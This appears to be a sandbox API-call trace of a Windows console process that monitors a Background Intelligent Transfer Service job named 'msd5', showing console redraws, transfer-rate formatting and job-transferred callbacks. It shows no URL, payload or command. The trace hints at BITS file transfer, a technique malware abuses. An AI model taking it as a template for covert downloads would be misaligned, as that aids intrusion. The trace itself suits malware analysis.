[0075.612] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x16e5dc | out: lpNumberOfAttrsWritten=0x16e5dc) returned 1
[0075.612] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0075.612] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.612] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5b0 | out: lpConsoleScreenBufferInfo=0x16e5b0) returned 1
[0075.612] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16e5c8, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5c8*=0xa) returned 1
[0075.612] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.613] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5ac | out: lpConsoleScreenBufferInfo=0x16e5ac) returned 1
[0075.613] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16e5c4, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5c4*=0x5) returned 1
[0075.613] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.613] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5b4 | out: lpConsoleScreenBufferInfo=0x16e5b4) returned 1
[0075.613] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16e5cc, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5cc*=0x7) returned 1
[0075.614] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.614] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5a8 | out: lpConsoleScreenBufferInfo=0x16e5a8) returned 1
[0075.614] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e5c0, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5c0*=0x8) returned 1
[0075.614] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.614] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5b0 | out: lpConsoleScreenBufferInfo=0x16e5b0) returned 1
[0075.614] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e5c8, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5c8*=0x8) returned 1
[0075.615] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.615] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5a4 | out: lpConsoleScreenBufferInfo=0x16e5a4) returned 1
[0075.615] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x16e5bc, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5bc*=0xc) returned 1
[0075.615] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.615] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5b4 | out: lpConsoleScreenBufferInfo=0x16e5b4) returned 1
[0075.615] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16e5cc, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5cc*=0xa) returned 1
[0075.616] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.616] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e59c | out: lpConsoleScreenBufferInfo=0x16e59c) returned 1
[0075.616] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16e5b4, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5b4*=0xa) returned 1
[0075.616] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.616] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5a4 | out: lpConsoleScreenBufferInfo=0x16e5a4) returned 1
[0075.616] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e5bc, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5bc*=0x8) returned 1
[0075.617] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.617] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16e5c8 | out: _Buffer="0") returned 1
[0075.617] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16e5d4 | out: _Buffer="1") returned 1
[0075.617] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5a4 | out: lpConsoleScreenBufferInfo=0x16e5a4) returned 1
[0075.617] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16e5bc, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5bc*=0x5) returned 1
[0075.617] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.617] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5ac | out: lpConsoleScreenBufferInfo=0x16e5ac) returned 1
[0075.618] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e5c4, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5c4*=0x8) returned 1
[0075.618] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.618] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16e5d0 | out: _Buffer="0") returned 1
[0075.618] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16e5c4 | out: lpSystemTimeAsFileTime=0x16e5c4*(dwLowDateTime=0xddae0a30, dwHighDateTime=0x1d469c7))
[0075.618] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16e5bc | out: lpSystemTimeAsFileTime=0x16e5bc*(dwLowDateTime=0xddae0a30, dwHighDateTime=0x1d469c7))
[0075.618] _finite (_X=0x0) returned 0
[0075.618] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e57c | out: lpConsoleScreenBufferInfo=0x16e57c) returned 1
[0075.618] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x16e594, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e594*=0xd) returned 1
[0075.618] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.619] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e588 | out: lpConsoleScreenBufferInfo=0x16e588) returned 1
[0075.619] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x16e5a0, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5a0*=0xf) returned 1
[0075.619] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.619] _vsnwprintf (in: _Buffer=0x16e3b4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x16e378 | out: _Buffer="0.00 B/S") returned 8
[0075.619] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5cc | out: lpConsoleScreenBufferInfo=0x16e5cc) returned 1
[0075.619] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e5e4, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16e5e4*=0x8) returned 1
[0075.620] CoTaskMemFree (pv=0x228310)
[0075.620] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0075.620] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0075.620] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16f668 | out: lpMode=0x16f668) returned 1
[0075.621] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0075.621] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x16f6a8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0075.770] PeekMessageW (in: lpMsg=0x16f680, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f680) returned 1
[0075.770] TranslateMessage (lpMsg=0x16f680) returned 0
[0075.770] DispatchMessageW (lpMsg=0x16f680) returned 0x1
[0075.770] IBackgroundCopyCallback:JobModification (This=0x230c28, pJob=0x21a644, dwReserved=0x0) returned 0x0
[0075.770] IBackgroundCopyJob:GetState (in: This=0x21a5b4, pVal=0x230c34 | out: pVal=0x230c34) returned 0x0
[0075.782] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fbc
[0075.782] IBackgroundCopyJob:GetType (in: This=0x21a5b4, pVal=0x16ed48 | out: pVal=0x16ed48) returned 0x0
[0075.783] IBackgroundCopyCallback:JobModification (This=0x230c28, pJob=0x21a644, dwReserved=0x0) returned 0x0
[0075.783] IBackgroundCopyJob:GetState (in: This=0x21a5b4, pVal=0x230c34 | out: pVal=0x230c34) returned 0x0
[0075.784] IBackgroundCopyJob:GetProgress (in: This=0x21a5b4, pVal=0x230c38 | out: pVal=0x230c38) returned 0x0
[0075.784] IBackgroundCopyJob:GetPriority (in: This=0x21a5b4, pVal=0x16ed44 | out: pVal=0x16ed44) returned 0x0
[0075.785] CoTaskMemFree (pv=0x0)
[0075.785] IBackgroundCopyJob:GetDisplayName (in: This=0x21a5b4, pVal=0x16ed5c | out: pVal=0x16ed5c*="msd5") returned 0x0
[0075.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed04 | out: lpConsoleScreenBufferInfo=0x16ed04) returned 1
[0075.786] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x16ed1c | out: lpNumberOfCharsWritten=0x16ed1c) returned 1
[0075.786] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x16ed1c | out: lpNumberOfAttrsWritten=0x16ed1c) returned 1
[0075.786] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0075.786] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.787] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecf0 | out: lpConsoleScreenBufferInfo=0x16ecf0) returned 1
[0075.787] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16ed08, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ed08*=0xa) returned 1
[0075.787] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.787] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecec | out: lpConsoleScreenBufferInfo=0x16ecec) returned 1
[0075.787] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16ed04, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ed04*=0x5) returned 1
[0075.788] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.788] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecf4 | out: lpConsoleScreenBufferInfo=0x16ecf4) returned 1
[0075.788] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16ed0c, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ed0c*=0x7) returned 1
[0075.788] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.788] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ece8 | out: lpConsoleScreenBufferInfo=0x16ece8) returned 1
[0075.788] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed00, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ed00*=0x8) returned 1
[0075.789] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.789] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecf0 | out: lpConsoleScreenBufferInfo=0x16ecf0) returned 1
[0075.789] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed08, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ed08*=0x8) returned 1
[0075.789] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.790] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ece4 | out: lpConsoleScreenBufferInfo=0x16ece4) returned 1
[0075.790] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x16ecfc, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ecfc*=0xc) returned 1
[0075.790] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.790] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecf4 | out: lpConsoleScreenBufferInfo=0x16ecf4) returned 1
[0075.790] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16ed0c, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ed0c*=0xa) returned 1
[0075.791] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.791] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecdc | out: lpConsoleScreenBufferInfo=0x16ecdc) returned 1
[0075.791] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16ecf4, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ecf4*=0xa) returned 1
[0075.791] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.792] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ece4 | out: lpConsoleScreenBufferInfo=0x16ece4) returned 1
[0075.792] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ecfc, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ecfc*=0x8) returned 1
[0075.792] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.792] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16ed08 | out: _Buffer="0") returned 1
[0075.792] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16ed14 | out: _Buffer="1") returned 1
[0075.792] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ece4 | out: lpConsoleScreenBufferInfo=0x16ece4) returned 1
[0075.792] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16ecfc, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ecfc*=0x5) returned 1
[0075.793] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.793] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecec | out: lpConsoleScreenBufferInfo=0x16ecec) returned 1
[0075.793] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed04, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ed04*=0x8) returned 1
[0075.793] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.794] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16ed10 | out: _Buffer="0") returned 1
[0075.794] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16ed14 | out: _Buffer="15") returned 2
[0075.794] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16ed10 | out: _Buffer="0") returned 1
[0075.794] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16ecfc | out: lpSystemTimeAsFileTime=0x16ecfc*(dwLowDateTime=0xddca9ab0, dwHighDateTime=0x1d469c7))
[0075.794] _finite (_X=0x0) returned 1
[0075.794] _finite (_X=0x0) returned 1
[0075.794] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecbc | out: lpConsoleScreenBufferInfo=0x16ecbc) returned 1
[0075.798] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x16ecd4, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ecd4*=0xd) returned 1
[0075.799] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.799] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecc8 | out: lpConsoleScreenBufferInfo=0x16ecc8) returned 1
[0075.799] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x16ece0, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ece0*=0xf) returned 1
[0075.799] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.800] _vsnwprintf (in: _Buffer=0x16eaf4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x16eab8 | out: _Buffer="0.00 B/S") returned 8
[0075.800] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed0c | out: lpConsoleScreenBufferInfo=0x16ed0c) returned 1
[0075.800] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed24, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16ed24*=0x8) returned 1
[0075.800] CoTaskMemFree (pv=0x228338)
[0075.801] PeekMessageW (in: lpMsg=0x16f680, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f680) returned 0
[0075.801] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x16f6a8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0076.060] PeekMessageW (in: lpMsg=0x16f680, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f680) returned 1
[0076.060] TranslateMessage (lpMsg=0x16f680) returned 0
[0076.060] DispatchMessageW (lpMsg=0x16f680) returned 0x1
[0076.060] IBackgroundCopyCallback:JobTransferred (This=0x230c28, pJob=0x21a644) returned 0x0
[0076.060] KillTimer (hWnd=0x0, uIDEvent=0x7fbc) returned 1
[0076.060] IBackgroundCopyJob:GetState (in: This=0x21a5b4, pVal=0x230c34 | out: pVal=0x230c34) returned 0x0
[0076.061] IBackgroundCopyCallback:JobModification (This=0x230c28, pJob=0x21a644, dwReserved=0x0) returned 0x0
[0076.061] IBackgroundCopyJob:GetState (in: This=0x21a5b4, pVal=0x230c34 | out: pVal=0x230c34) returned 0x0
[0076.062] IBackgroundCopyJob:GetType (in: This=0x21a5b4, pVal=0x16dcb8 | out: pVal=0x16dcb8) returned 0x0
[0076.063] IBackgroundCopyJob:GetProgress (in: This=0x21a5b4, pVal=0x230c38 | out: pVal=0x230c38) returned 0x0
[0076.064] IBackgroundCopyJob:GetPriority (in: This=0x21a5b4, pVal=0x16dcb4 | out: pVal=0x16dcb4) returned 0x0
[0076.065] CoTaskMemFree (pv=0x0)
[0076.065] IBackgroundCopyJob:GetDisplayName (in: This=0x21a5b4, pVal=0x16dccc | out: pVal=0x16dccc*="msd5") returned 0x0
[0076.066] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc74 | out: lpConsoleScreenBufferInfo=0x16dc74) returned 1
[0076.066] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x16dc8c | out: lpNumberOfCharsWritten=0x16dc8c) returned 1
[0076.066] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x16dc8c | out: lpNumberOfAttrsWritten=0x16dc8c) returned 1
[0076.066] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0076.067] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1
[0076.067] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16dc78, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc78*=0xa) returned 1
[0076.067] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc5c | out: lpConsoleScreenBufferInfo=0x16dc5c) returned 1
[0076.068] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16dc74, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc74*=0x5) returned 1
[0076.068] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc64 | out: lpConsoleScreenBufferInfo=0x16dc64) returned 1
[0076.068] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16dc7c, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc7c*=0x7) returned 1
[0076.069] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.069] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc58 | out: lpConsoleScreenBufferInfo=0x16dc58) returned 1
[0076.069] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16dc70, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc70*=0x8) returned 1
[0076.069] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.069] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc60 | out: lpConsoleScreenBufferInfo=0x16dc60) returned 1
[0076.070] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16dc78, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc78*=0x8) returned 1
[0076.070] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.070] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc54 | out: lpConsoleScreenBufferInfo=0x16dc54) returned 1
[0076.070] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x16dc6c, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc6c*=0xd) returned 1
[0076.071] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc64 | out: lpConsoleScreenBufferInfo=0x16dc64) returned 1
[0076.071] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16dc7c, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc7c*=0xa) returned 1
[0076.071] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc4c | out: lpConsoleScreenBufferInfo=0x16dc4c) returned 1
[0076.072] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16dc64, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc64*=0xa) returned 1
[0076.072] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.072] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc54 | out: lpConsoleScreenBufferInfo=0x16dc54) returned 1
[0076.072] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16dc6c, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc6c*=0x8) returned 1
[0076.073] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.073] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dc78 | out: _Buffer="1") returned 1
[0076.073] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dc84 | out: _Buffer="1") returned 1
[0076.073] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc54 | out: lpConsoleScreenBufferInfo=0x16dc54) returned 1
